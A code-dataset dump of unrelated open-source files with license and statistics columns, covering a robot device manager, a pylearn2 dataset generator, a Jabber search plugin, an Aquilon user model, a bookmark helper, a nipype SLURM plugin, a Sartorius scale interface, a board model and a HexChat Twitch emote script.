Stop the main loop from running. Does not automatically unload devices
or stop them.
"""
self._run_loop = False
def shutdown(self):
"""
Shutdown all loaded devices (will propagate all the way down to cleanup
of GPIO pins).
"""
for d in self.loaded_devices:
self.unload_device(d.name)
def load_device(self,d):
"""
Load a device into the DeviceManager.
"""
try:
d.connect(self.manager_id)
if d.name in list(self.loaded_devices_dict.keys()):
message = "device {:s} already connected!".format(d.name)
self._queue_message(message,destination_device="warn")
else:
self.loaded_devices.append(d)
self.loaded_devices_dict[d.name] = len(self.loaded_devices) - 1
self.device_processes.append(multiprocessing.Process(target=self.loaded_devices[-1].start))
self.device_processes[-1].start()
except exceptions.BotConnectionError as err:
self._queue_message(err,destination_device="warn")
def unload_device(self,device_name):
"""
Unload a device from the control of the DeviceManager.
"""
try:
index = self.loaded_devices_dict[device_name]
# Stop the device, diconnect it from this device manager instance,
# and then kill its thread.
self.loaded_devices[index].stop(self.manager_id)
self.loaded_devices[index].disconnect()
self.device_processes[index].terminate()
# Remove it from the lists holding the devices.
for k in self.loaded_devices_dict.keys():
self.loaded_devices_dict[k] -= 1
self.loaded_devices.pop(index)
self.loaded_devices_dict.pop(device_name)
self.device_processes.pop(index)
except KeyError:
message = "device {} is not connected".format(device_name)
self._queue_message(message,destination_device="warn")
def _run(self):
for d in self.device_list:
self.load_device(d)
self._queue_message("starting system")
while self._run_loop:
# Go through the queue and pipe messages to appropriate devices
if len(self.queue) > 0:
# Get the next message
message = self._get_message()
# If the message is past its delay, send it to a device. If not,
# stick it back into the queue
if message.check_delay() == True:
self._message_to_device(message)
else:
self._queue_message(message)
# Rotate through the loaded devices and see if any of them have
# output ready. If so, put the output into the queue for the next
# pass.
for d in self.loaded_devices:
msgs = d.get()
for m in msgs:
self._queue_message(m)
# Wait poll_interval seconds before checking queues again
time.sleep(self.poll_interval)
def _message_to_device(self,message):
"""
Send a RobotMessage instance to appropriate devices
"""
# if the message is sent to the virtual "warn" device, forward this to
# the controller
if message.destination_device == "warn":
self.loaded_devices[self.loaded_devices_dict["controller"]].put(message)
return
try:
self.loaded_devices[self.loaded_devices_dict[message.destination_device]].put(message)
except KeyError:
err = "device \"{}\" not loaded.".format(message.destination_device)
self._queue_message(err,destination_device="warn")
def _queue_message(self,
message="",
destination="robot",
destination_device="",
delay_time=0.0,
msg_string=None):
"""
Append to a RobotMessage instance to to the message queue. If message
is already a RobotMessage, pass it through without modification. If it
is a string, construct the RobotMessage, setting source to "manager".
"""
if type(message) != RobotMessage:
m = RobotMessage(destination=destination,
destination_device=destination_device,
source="manager",
source_device="",
delay_time=delay_time,
message=message)
# If msg_string is set to something besides None, parse that string
# and load into the RobotMessage instance.
if msg_string != None:
m.from_string(msg_string)
message = m
if self.verbosity > 0:
message.pretty_print()
self.queue.append(message) #.put(message)
def _get_message(self):
"""
Return the first message in the queue.
"""
if len(self.queue) == 0:
return
message = self.queue.pop(0) #.get()
# If this is a raw message string, convert it to a RobotMessage
# instance
if type(message) == str:
try:
m = RobotMessage()
m.from_string(message)
message = m
except exceptions.BotMessageError as err:
message = "Mangled message ({})".format(err.args[0])
self._queue_message(message,destination_device="warn")
return None
if self.verbosity > 0:
message.pretty_print()
return message
| mit | -6,191,918,146,514,756,000 | 31.917808 | 107 | 0.545152 | false | 4.565548 | false | false | false |
se4u/pylearn2 | pylearn2/scripts/tutorials/gae_demo/make_random_dataset.py | 39 | 4281 | """
This script creates a preprocessed dataset of image pairs
related by the defined transformation. The content of the
images is generated with a uniform distribution, this to
to show that the gating models do not depend on the
content but only on the relations.
"""
import itertools
import numpy
from pylearn2.datasets import preprocessing
from pylearn2.utils import serial
from pylearn2.datasets import dense_design_matrix
from pylearn2.utils.rng import make_np_rng
from pylearn2.datasets.vector_spaces_dataset import VectorSpacesDataset
from pylearn2.space import VectorSpace, CompositeSpace, Conv2DSpace
def generate(opc):
"""
Summary (Generates a dataset with the chosen transformation).
Parameters
----------
opc: string
Only two options, shifts or rotations.
"""
dim = 19 # outer square
# A bigger image is used to avoid empty pixels in the
# borders.
reg = 13 # inner square
total = 20000 # Number of training examples
im1 = numpy.zeros((total, reg, reg, 1), dtype='float32')
im2 = numpy.zeros((total, reg, reg, 1), dtype='float32')
Y = numpy.zeros((total, 1), dtype='uint8')
rng = make_np_rng(9001, [1, 2, 3], which_method="uniform")
transformation = opc
if transformation == 'shifts':
# Shifts
# only shifts between [-3, +3] pixels
shifts = list(itertools.product(range(-3, 4), range(-3, 4)))
t = 0
while t < total:
x = rng.uniform(0, 1, (dim, dim))
x = numpy.ceil(x * 255)
im_x = x[3:16, 3:16][:, :, None]
ind = rng.randint(0, len(shifts))
Y[t] = ind
txy = shifts[ind]
tx, ty = txy
im_y = x[(3 + tx):(16 + tx), (3 + ty):(16 + ty)][:, :, None]
im1[t, :] = im_x
im2[t, :] = im_y
t += 1
else:
assert transformation == 'rotations'
# Rotations
import Image
# import cv2
angs = numpy.linspace(0, 359, 90)
t = 0
while t < total:
x = rng.uniform(0, 1, (dim, dim))
x = numpy.ceil(x * 255)
im_x = x[3:16, 3:16][:, :, None]
ind = rng.randint(0, len(angs))
Y[t] = ind
ang = angs[ind]
y = numpy.asarray(Image.fromarray(x).rotate(ang))
# scale = 1
# M1 = cv2.getRotationMatrix2D((dim/2, dim/2), ang, scale)
# y = cv2.warpAffine(x, M1, (dim, dim))
im_y = y[3:16, 3:16][:, :, None]
im1[t, :] = im_x
im2[t, :] = im_y
t += 1
view_converter = dense_design_matrix.DefaultViewConverter((reg, reg, 1))
design_X = view_converter.topo_view_to_design_mat(im1)
design_Y = view_converter.topo_view_to_design_mat(im2)
# Normalize data:
pipeline = preprocessing.Pipeline()
gcn = preprocessing.GlobalContrastNormalization(
sqrt_bias=10., use_std=True)
pipeline.items.append(gcn)
XY = numpy.concatenate((design_X, design_Y), 0)
XY_ImP = dense_design_matrix.DenseDesignMatrix(X=XY)
XY_ImP.apply_preprocessor(preprocessor=pipeline, can_fit=True)
X1 = XY_ImP.X[0:design_X.shape[0], :]
X2 = XY_ImP.X[design_X.shape[0]:, :]
# As a Conv2DSpace
topo_X1 = view_converter.design_mat_to_topo_view(X1)
topo_X2 = view_converter.design_mat_to_topo_view(X2)
axes = ('b', 0, 1, 'c')
data_specs = (CompositeSpace(
[Conv2DSpace((reg, reg), num_channels=1, axes=axes),
Conv2DSpace((reg, reg), num_channels=1, axes=axes),
VectorSpace(1)]),
('featuresX', 'featuresY', 'targets'))
train = VectorSpacesDataset((topo_X1, topo_X2, Y), data_specs=data_specs)
# As a VectorSpace
# data_specs = (CompositeSpace(
# [VectorSpace(reg * reg),
# VectorSpace(reg * reg),
# VectorSpace(1)]),
# ('featuresX', 'featuresY', 'targets'))
# train = VectorSpacesDataset(data=(X1, X2, Y), data_specs=data_specs)
import os
save_path = os.path.dirname(os.path.realpath(__file__))
serial.save(os.path.join(save_path, 'train_preprocessed.pkl'), train)
if __name__ == '__main__':
# Define the desired transformation between views
generate('shifts') # shifts or rotations
| bsd-3-clause | -1,117,137,382,878,355,200 | 33.804878 | 77 | 0.58818 | false | 3.310905 | false | false | false |
PatrickKennedy/pygab | plugins/plugin_search.py | 1 | 2865 | #!/usr/bin/env python
#
# PyGab - Python Jabber Framework
# Copyright (c) 2008, Patrick Kennedy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
import random
import re
import shlex
import time
from common import argparse, const, mounts, utils
from common.ini import iMan
class Init(mounts.PluginInitializers):
name = __file__
def initialize(self):
iMan.load([utils.get_module(), 'roster'])
def __exit__(self, *args):
iMan.unload('roster')
mounts.PluginInitializers.remove(self.__class__)
class Search(mounts.CommandMount):
name = 'search'
rank = const.RANK_USER
file = __file__
__doc__ = """Search for users containing a passed arg.
Dan - Searches for all names containing 'dan'
*Dan - Searches for all names ending with 'dan'
Dan* - Searches for all names beginning with 'dan'"""
def thread(self, user, sub, whisper):
#if not self.parent.was_whispered and not utils.isadmin(user):
#raise const.CommandHelp, 'Whisper Only Command'
sub = sub.lower().encode('utf-8', 'replace')
base = str
if len(sub) < 3:
raise const.CommandHelp, 'Minimum 3 Letters'
if sub.startswith('*'):
sub = sub[1:]
func = base.endswith
elif sub.endswith('*'):
sub = sub[:-1]
func = base.startswith
else:
func = base.count
names = [name for name in iMan.roster if func(name, sub)]
if names:
reply = 'Matched Names (%s) - %s' % (len(names), ', '.join(names))
else:
reply = "I can't find anyone with your search parameters."
if self.parent.was_whispered:
self.parent.sendto(user, reply)
else:
self.parent.sendtoall(reply)
| bsd-2-clause | 7,516,865,461,557,719,000 | 31.931034 | 76 | 0.72356 | false | 3.506732 | false | false | false |
stdweird/aquilon | upgrade/1.4.5/aquilon/aqdb/model/user_principal.py | 4 | 4174 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Contains tables and objects for authorization in Aquilon """
from datetime import datetime
from sqlalchemy import (Table, Column, Integer, DateTime, Sequence, String,
select, ForeignKey, PassiveDefault, UniqueConstraint)
from sqlalchemy.orm import relation, deferred
from aquilon.aqdb.model import Base, Role, Realm
class UserPrincipal(Base):
""" Simple class for strings representing users kerberos credential """
__tablename__ = 'user_principal'
id = Column(Integer, Sequence('user_principal_id_seq'), primary_key=True)
name = Column(String(32), nullable=False)
realm_id = Column(Integer, ForeignKey(
'realm.id', name='usr_princ_rlm_fk'), nullable=False)
role_id = Column(Integer, ForeignKey(
'role.id', name='usr_princ_role_fk', ondelete='CASCADE'),
nullable=False)
creation_date = deferred(Column(DateTime,
nullable=False, default=datetime.now))
comments = deferred(Column('comments', String(255), nullable=True))
realm = relation(Realm, uselist=False)
role = relation(Role, uselist=False)
def __str__(self):
return '@'.join([self.name,self.realm.name])
user_principal = UserPrincipal.__table__
user_principal.primary_key.name='user_principal_pk'
user_principal.append_constraint(
UniqueConstraint('name','realm_id',name='user_principal_realm_uk'))
table = user_principal
def populate(sess, *args, **kw):
if len(sess.query(UserPrincipal).all()) < 1:
log = kw['log']
from sqlalchemy import insert
admin = sess.query(Role).filter_by(name='aqd_admin').one()
eng = sess.query(Role).filter_by(name='engineering').one()
ops = sess.query(Role).filter_by(name='operations').one()
telco = sess.query(Role).filter_by(name='telco_eng').one()
admins = ['cdb', 'aqdqa', 'njw', 'wesleyhe', 'daqscott', 'kgreen',
'benjones']
unixeng = ['cesarg', 'jasona', 'dankb', 'goliaa', 'samsh', 'hagberg',
'hookn', 'jelinker', 'kovacsk', 'lookerm', 'walkert', 'af',
'lillied']
operations = ['premdasr', 'bestc', 'chawlav', 'wbarnes', 'gleasob',
'lchun', 'peteryip', 'richmoj', 'hardyb', 'martinva']
telco_eng = ['dalys', 'medinad', 'peikonb', 'kulawiak']
r = sess.query(Realm).first()
assert(r.name == 'is1.morgan')
for nm in admins:
up=UserPrincipal(name = nm, realm = r,role = admin,
comments = 'AutoPopulated')
sess.add(up)
sess.commit()
assert(up)
for nm in unixeng:
up=UserPrincipal(name = nm, realm = r,role = eng,
comments = 'AutoPopulated')
sess.add(up)
sess.commit()
assert(up)
for nm in operations:
up=UserPrincipal(name = nm, realm = r, role = ops,
comments = 'AutoPopulated')
sess.add(up)
sess.commit()
assert(up)
for nm in telco_eng:
up = UserPrincipal(name = nm, realm = r, role = telco,
comments = 'AutoPopulated')
sess.add(up)
sess.commit()
assert(up)
cnt = len(sess.query(UserPrincipal).all())
assert(cnt > 0)
log.debug('created %s users'%(cnt))
| apache-2.0 | -2,977,128,603,027,531,300 | 34.982759 | 78 | 0.597269 | false | 3.733453 | false | false | false |
yusufb/file-manager | modules/bookmark.py | 1 | 2022 | '''
Created on May 13, 2014
@author: utku, yusuf
'''
import json
import pprint
from src import jsonFile
def addToBookmarks2(jsonfile, path, name):
j = jsonFile.jsonFile()
toAdd = {'path' : path, 'name' : name}
readFromFile = j.fileToJson(jsonfile)
#pprint(readFromFile)
for paths in readFromFile:
if paths['path'] == path:
print 'already in bookmarks'
return
toWriteList = []
toWriteList.extend(readFromFile)
toWriteList.append(dict(toAdd))
if j.jsonToFile(toWriteList, jsonfile):
print 'added to bookmarks'
def checkBookmarkList(path, filePath):
return path in getAllPaths(filePath)
'''def addToBookmarks(jsonfile, path, name):
if checkBookmarkList(path, jsonfile):
print 'already in bookmarks'
else:
with open(jsonfile, 'a') as datafile:
json.dump(createJSONObject(jsonfile, path, name), datafile)
print 'added to bookmarks'''
'''def createJSONObject(jsonfile, path, name):
data = {'id':idGenerator(jsonfile), 'path':str(path), 'name':name}
return data'''
def readBookmarks(jsonFile):
plainJSONString = open(jsonFile).read();
plainJSONString = plainJSONString.replace('}{', '},{')
jsonList = '[%s]'%(plainJSONString)
jsonObj = json.loads(jsonList)
return jsonObj
def getAllPaths(jsonFile):
availablePaths = []
jsonObjj = readBookmarks(jsonFile)
for index in range(len(jsonObjj)):
availablePaths.append(jsonObjj[index]['path'])
return availablePaths
def showAllBookmarks(jsonFile):
jsonObjj = readBookmarks(jsonFile)
allBookmarks = []
for index in range(len(jsonObjj)):
allBookmarks.append(jsonObjj[index])
return allBookmarks
'''def idGenerator(jsonFile):
jsonObjj = readBookmarks(jsonFile)
if jsonObjj != []:
return jsonObjj[len(jsonObjj)-1]['id'] + 1
else:
return 0'''
| gpl-3.0 | -3,408,347,511,843,042,300 | 26.478873 | 71 | 0.626113 | false | 3.663043 | false | false | false |
FCP-INDI/nipype | nipype/pipeline/plugins/slurmgraph.py | 5 | 7236 | """Parallel workflow execution via SLURM
"""
import os
import sys
from .base import (GraphPluginBase, logger)
from ...interfaces.base import CommandLine
def node_completed_status(checknode):
"""
A function to determine if a node has previously completed it's work
:param checknode: The node to check the run status
:return: boolean value True indicates that the node does not need to be run.
"""
""" TODO: place this in the base.py file and refactor """
node_state_does_not_require_overwrite = (checknode.overwrite is False or
(checknode.overwrite is None and not
checknode._interface.always_run)
)
hash_exists = False
try:
hash_exists, _, _, _ = checknode.hash_exists()
except Exception:
hash_exists = False
return (hash_exists and node_state_does_not_require_overwrite)
class SLURMGraphPlugin(GraphPluginBase):
"""Execute using SLURM
The plugin_args input to run can be used to control the SGE execution.
Currently supported options are:
- template : template to use for batch job submission
- qsub_args : arguments to be prepended to the job execution script in the
qsub call
"""
_template = "#!/bin/bash"
def __init__(self, **kwargs):
if 'plugin_args' in kwargs and kwargs['plugin_args']:
if 'retry_timeout' in kwargs['plugin_args']:
self._retry_timeout = kwargs['plugin_args']['retry_timeout']
if 'max_tries' in kwargs['plugin_args']:
self._max_tries = kwargs['plugin_args']['max_tries']
if 'template' in kwargs['plugin_args']:
self._template = kwargs['plugin_args']['template']
if os.path.isfile(self._template):
self._template = open(self._template).read()
if 'sbatch_args' in kwargs['plugin_args']:
self._sbatch_args = kwargs['plugin_args']['sbatch_args']
if 'dont_resubmit_completed_jobs' in kwargs['plugin_args']:
self._dont_resubmit_completed_jobs = kwargs['plugin_args']['dont_resubmit_completed_jobs']
else:
self._dont_resubmit_completed_jobs = False
super(SLURMGraphPlugin, self).__init__(**kwargs)
def _submit_graph(self, pyfiles, dependencies, nodes):
def make_job_name(jobnumber, nodeslist):
"""
- jobnumber: The index number of the job to create
- nodeslist: The name of the node being processed
- return: A string representing this job to be displayed by SLURM
"""
job_name = 'j{0}_{1}'.format(jobnumber, nodeslist[jobnumber]._id)
# Condition job_name to be a valid bash identifier (i.e. - is invalid)
job_name = job_name.replace('-', '_').replace('.', '_').replace(':', '_')
return job_name
batch_dir, _ = os.path.split(pyfiles[0])
submitjobsfile = os.path.join(batch_dir, 'submit_jobs.sh')
cache_doneness_per_node = dict()
if self._dont_resubmit_completed_jobs: # A future parameter for controlling this behavior could be added here
for idx, pyscript in enumerate(pyfiles):
node = nodes[idx]
node_status_done = node_completed_status(node)
# if the node itself claims done, then check to ensure all
# dependancies are also done
if node_status_done and idx in dependencies:
for child_idx in dependencies[idx]:
if child_idx in cache_doneness_per_node:
child_status_done = cache_doneness_per_node[child_idx]
else:
child_status_done = node_completed_status(nodes[child_idx])
node_status_done = node_status_done and child_status_done
cache_doneness_per_node[idx] = node_status_done
with open(submitjobsfile, 'wt') as fp:
fp.writelines('#!/usr/bin/env bash\n')
fp.writelines('# Condense format attempted\n')
for idx, pyscript in enumerate(pyfiles):
node = nodes[idx]
if cache_doneness_per_node.get(idx, False):
continue
else:
template, sbatch_args = self._get_args(
node, ["template", "sbatch_args"])
batch_dir, name = os.path.split(pyscript)
name = '.'.join(name.split('.')[:-1])
batchscript = '\n'.join((template,
'%s %s' % (sys.executable, pyscript)))
batchscriptfile = os.path.join(batch_dir,
'batchscript_%s.sh' % name)
batchscriptoutfile = batchscriptfile + '.o'
batchscripterrfile = batchscriptfile + '.e'
with open(batchscriptfile, 'wt') as batchfp:
batchfp.writelines(batchscript)
batchfp.close()
deps = ''
if idx in dependencies:
values = ''
for jobid in dependencies[idx]:
# Avoid dependancies of done jobs
if not self._dont_resubmit_completed_jobs or cache_doneness_per_node[jobid] == False:
values += "${{{0}}}:".format(make_job_name(jobid, nodes))
if values != '': # i.e. if some jobs were added to dependency list
values = values.rstrip(':')
deps = '--dependency=afterok:%s' % values
jobname = make_job_name(idx, nodes)
# Do not use default output locations if they are set in self._sbatch_args
stderrFile = ''
if self._sbatch_args.count('-e ') == 0:
stderrFile = '-e {errFile}'.format(
errFile=batchscripterrfile)
stdoutFile = ''
if self._sbatch_args.count('-o ') == 0:
stdoutFile = '-o {outFile}'.format(
outFile=batchscriptoutfile)
full_line = '{jobNm}=$(sbatch {outFileOption} {errFileOption} {extraSBatchArgs} {dependantIndex} -J {jobNm} {batchscript} | awk \'/^Submitted/ {{print $4}}\')\n'.format(
jobNm=jobname,
outFileOption=stdoutFile,
errFileOption=stderrFile,
extraSBatchArgs=sbatch_args,
dependantIndex=deps,
batchscript=batchscriptfile)
fp.writelines(full_line)
cmd = CommandLine('bash', environ=dict(os.environ),
terminal_output='allatonce')
cmd.inputs.args = '%s' % submitjobsfile
cmd.run()
logger.info('submitted all jobs to queue')
| bsd-3-clause | 758,317,311,789,076,100 | 47.24 | 189 | 0.526534 | false | 4.45841 | false | false | false |
rgieseke/pySartorius | sartorius.py | 1 | 1654 | # -*- coding: utf-8 -*-
"""
Python Interface for
Sartorius Serial Interface for
EA, EB, GD, GE, TE scales.
2010-2011 Robert Gieseke - [email protected]
See LICENSE.
"""
import serial
class Sartorius(serial.Serial):
def __init__(self, com_port):
"""
Initialise Sartorius device.
Example:
scale = Sartorius('COM1')
"""
serial.Serial.__init__(self, com_port)
self.baudrate = 9600
self.bytesize = 7
self.parity = serial.PARITY_ODD
self.timeout = 0.5
def value(self):
"""
Return displayed scale value.
"""
try:
if self.inWaiting() == 0:
self.write('\033P\n')
answer = self.readline()
if len(answer) == 16: # menu code 7.1.1
answer = float(answer[0:11].replace(' ', ''))
else: # menu code 7.1.2
answer = float(answer[6:17].replace(' ',''))
return answer
except:
return "NA"
def display_unit(self):
"""
Return unit.
"""
self.write('\033P\n')
answer = self.readline()
try:
answer = answer[11].strip()
except:
answer = ""
return answer
def tara_zero(self):
"""
Tara and zeroing combined.
"""
self.write('\033T\n')
def tara(self):
"""
Tara.
"""
self.write('\033U\n')
def zero(self):
"""
Zero.
"""
self.write('\033V\n')
| mit | -6,888,341,060,729,988,000 | 20.972222 | 61 | 0.450423 | false | 3.900943 | false | false | false |
Lancea12/sudoku_solver | sudoku/models/board.py | 1 | 2616 | from ..main import db
import math
import logging
class Board(db.Model):
#user = models.ForeignKey(User)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
user = db.relationship('User', backref=db.backref('boards', lazy=True))
name = models.CharField(max_length=255)
anchored = models.BooleanField(default=False)
history_loc = models.IntegerField(default=-1)
shared_with = models.ManyToManyField(User, related_name='shared_with_me', through='Board_Share')
logger = logging.getLogger('solver')
class Meta:
app_label = "solver"
def context(self):
return {'name' : self.name,
'id' : self.id,
'anchored' : self.anchored,
'rows' : [row.context() for row in self.row_set.extra(order_by = ['row_index'])],
'history' : self.history_context(),
'history_loc' : self.history_loc
}
def history_context(self):
context = {}
for e in sorted(self.historyentry_set.all()):
context[e.order] = e.context()
return context
def update(self, data):
self.logger.debug('updating board')
history = data['history']
most_recent = data['most_recent']
self.history_loc = data['history_loc']
#self.logger.debug(history)
self.logger.debug('loc = %d, most recent = %d' % (self.history_loc, most_recent))
self.name = data['name']
self.anchored = data['anchored']
row_data = data['rows']
[e.delete() for e in self.historyentry_set.all()]
from solver.models.cell import Cell
for entry_index in sorted(history):
self.logger.debug('entry = %d' % (int(entry_index)))
if(int(entry_index) > most_recent):
break
entry = history[entry_index]
cell = Cell.objects.get(row__board=self.id, \
row__row_index=entry['row_index'], cell_index=entry['col_index'])
self.historyentry_set.create(cell=cell, choice=entry['choice'], \
action=entry['action'], loc=entry_index, order=entry_index)
for row in self.row_set.extra(order_by = ['row_index']):
#self.logger.debug(row.row_index)
if(not row.update(row_data.__getitem__(row.row_index))):
return False
self.save()
return True
@receiver(post_save, sender=Board)
def build_board(sender, instance, **kwargs):
if not kwargs['created']:
return
from solver.models.row import Row
from solver.models.cell import Cell
for num in range(0,9):
instance.row_set.create(row_index=num)
for row in instance.row_set.all():
for index in range(0,9):
Cell.objects.create(row=row, cell_index=index)
| mit | -6,964,963,407,222,402,000 | 31.296296 | 98 | 0.638761 | false | 3.388601 | false | false | false |
Poorchop/hexchat-scripts | twitch-autoemote.py | 2 | 8205 | # coding=utf-8
import hexchat
import os
import sys
if sys.version_info[0] == 2:
import urllib2 as urllib_error
import urllib as urllib_request
else:
import urllib.error as urllib_error
import urllib.request as urllib_request
__module_name__ = "Twitch Emote Autoformat"
__module_author__ = "Poorchop"
__module_version__ = "0.8"
__module_description__ = "Automatically format TwitchTV emote names with proper capitalization"
# TODO: cross platform support
# TODO: emote unicode character support
# TODO: only load subscriber emotes for subscribed/specified channels
# change this value to False if you do not wish to use subscriber emotes
allow_sub_emotes = True
events = ("Channel Message", "Channel Msg Hilight",
"Channel Action", "Channel Action Hilight",
"Your Message")
edited = False
# emote names taken from: http://twitchemotes.com/
# list last updated August 18, 2014
emote_dict = {'4head': '4Head',
'arsonnosexy': 'ArsonNoSexy',
'asianglow': 'AsianGlow',
'atgl': 'AtGL',
'ativy': 'AtIvy',
'atww': 'AtWW',
'bcwarrior': 'BCWarrior',
'bort': 'BORT',
'batchest': 'BatChest',
'biblethump': 'BibleThump',
'bigbrother': 'BigBrother',
'bionicbunion': 'BionicBunion',
'blargnaunt': 'BlargNaut',
'bloodtrail': 'BloodTrail',
'brainslug': 'BrainSlug',
'brokeback': 'BrokeBack',
'cougarhunt': 'CougarHunt',
'daesuppy': 'DAESuppy',
'dbstyle': 'DBstyle',
'dansgame': 'DansGame',
'datsheffy': 'DatSheffy',
'dogface': 'DogFace',
'eagleeye': 'EagleEye',
'elegiggle': 'EleGiggle',
'evilfetus': 'EvilFetus',
'fpsmarksman': 'FPSMarksman',
'fungineer': 'FUNgineer',
'failfish': 'FailFish',
'frankerz': 'FrankerZ',
'freakinstinkin': 'FreakinStinkin',
'fuzzyotteroo': 'FuzzyOtterOO',
'gasjoker': 'GasJoker',
'gingerpower': 'GingerPower',
'grammarking': 'GrammarKing',
'hassaanchop': 'HassaanChop',
'hassanchop': 'HassanChop',
'hotpokket': 'HotPokket',
'itsboshytime': 'ItsBoshyTime',
'jkanstyle': 'JKanStyle',
'jebaited': 'Jebaited',
'joncarnage': 'JonCarnage',
'kapow': 'KAPOW',
'kzassault': 'KZassault',
'kzcover': 'KZcover',
'kzguerilla': 'KZguerilla',
'kzhelghast': 'KZhelghast',
'kzowl': 'KZowl',
'kzskull': 'KZskull',
'kappa': 'Kappa',
'keepo': 'Keepo',
'kevinturtle': 'KevinTurtle',
'kippa': 'Kippa',
'kreygasm': 'Kreygasm',
'mvgame': 'MVGame',
'mechasupes': 'MechaSupes',
'mrdestructoid': 'MrDestructoid',
'nightbat': 'NightBat',
'ninjatroll': 'NinjaTroll',
'nonospot': 'NoNoSpot',
'omgscoots': 'OMGScoots',
'onehand': 'OneHand',
'opieop': 'OpieOP',
'optimizeprime': 'OptimizePrime',
'pjharley': 'PJHarley',
'pjsalt': 'PJSalt',
'pmstwin': 'PMSTwin',
'panicvis': 'PanicVis',
'pazpazowitz': 'PazPazowitz',
'peopleschamp': 'PeoplesChamp',
'picomause': 'PicoMause',
'pipehype': 'PipeHype',
'pogchamp': 'PogChamp',
'poooound': 'Poooound',
'punchtrees': 'PunchTrees',
'ralpherz': 'RalpherZ',
'redcoat': 'RedCoat',
'residentsleeper': 'ResidentSleeper',
'ritzmitz': 'RitzMitz',
'rulefive': 'RuleFive',
'smorc': 'SMOrc',
'smskull': 'SMSkull',
'ssssss': 'SSSsss',
'shazbotstix': 'ShazBotstix',
'shazam': "Shazam",
'sobayed': 'SoBayed',
'sonnerlater': 'SoonerLater',
'srihead': 'SriHead',
'stonelightning': 'StoneLightning',
'strawbeary': 'StrawBeary',
'supervinlin': 'SuperVinlin',
'swiftrage': 'SwiftRage',
'tf2john': 'TF2John',
'tehfunrun': 'TehFunrun',
'theringer': 'TheRinger',
'thetarfu': 'TheTarFu',
'thething': 'TheThing',
'thunbeast': 'ThunBeast',
'tinyface': 'TinyFace',
'toospicy': 'TooSpicy',
'trihard': 'TriHard',
'uleetbackup': 'UleetBackup',
'unsane': 'UnSane',
'unclenox': 'UncleNox',
'volcania': 'Volcania',
'wtruck': 'WTRuck',
'wholewheat': 'WholeWheat',
'winwaker': 'WinWaker',
'youwhy': 'YouWHY',
'aneleanele': 'aneleanele',
'noscope420': 'noScope420',
'shazamicon': 'shazamicon'}
def parse_sub_emotes(file_path):
f = open(file_path, "r")
for line in f:
stripped_emote = line.replace("\n", "")
lowercase_emote = stripped_emote.lower()
emote_dict[lowercase_emote] = stripped_emote
f.close()
def download_emotes(file_path):
url = "https://raw.githubusercontent.com/Poorchop/hexchat-scripts/master/twitch-sub-emotes.txt"
try:
urllib_request.urlretrieve(url, file_path)
hexchat.prnt("Successfully downloaded subscriber emote list")
parse_sub_emotes(file_path)
except urllib_error.HTTPError as e:
hexchat.prnt("Could not retrieve subscriber emote list ({}), try downloading manually at {} and then reload "
"this script".format(e, url))
if allow_sub_emotes:
file_path = os.path.join(hexchat.get_info("configdir"),
"addons", "twitch-sub-emotes.txt")
if os.path.exists(file_path):
parse_sub_emotes(file_path)
else:
download_emotes(file_path)
def is_twitch():
server = hexchat.get_info("host")
if server and "twitch.tv" in server:
return True
else:
return False
def keypress_cb(word, word_eol, userdata):
key = word[0]
mod = word[1]
# a ctrl backspace
if (key, mod) == ("97", "4") or key == "65288":
return
if is_twitch():
msg = hexchat.get_info("inputbox")
if msg:
split_words = msg.split(" ")
for w in split_words:
if w.lower() in emote_dict:
split_words[split_words.index(w)] = emote_dict[w.lower()]
new_msg = " ".join(split_words)
hexchat.command("SETTEXT {}".format(new_msg))
hexchat.command("SETCURSOR {}".format(len(new_msg)))
def emote_cb(word, word_eol, event):
word = [(word[i] if len(word) > i else "") for i in range(4)]
global edited
if edited:
return
if is_twitch():
word[1] = word[1] \
.replace(":)", "😊") \
.replace(":(", "☹") \
.replace(":z", "😴") \
.replace("B)", "😎") \
.replace(";)", "😉") \
.replace(";p", "😜") \
.replace(":p", "😛") \
.replace(":D", "😄") \
.replace(">(", "😠") \
.replace("<3", "♥") \
.replace("BionicBunion", "😺") \
.replace("FrankerZ", "🐶") \
.replace("ItsBoshyTime", "⚠") \
.replace("Kappa", "😏") \
.replace("KZskull", "💀")
edited = True
hexchat.emit_print(event, *word)
edited = False
return hexchat.EAT_ALL
hexchat.hook_print("Key Press", keypress_cb)
for event in events:
hexchat.hook_print(event, emote_cb, event, priority=hexchat.PRI_HIGH)
hexchat.prnt(__module_name__ + " version " + __module_version__ + " loaded")
| mit | -3,323,768,482,977,047,600 | 32.871369 | 117 | 0.503246 | false | 3.253487 | false | false | false |
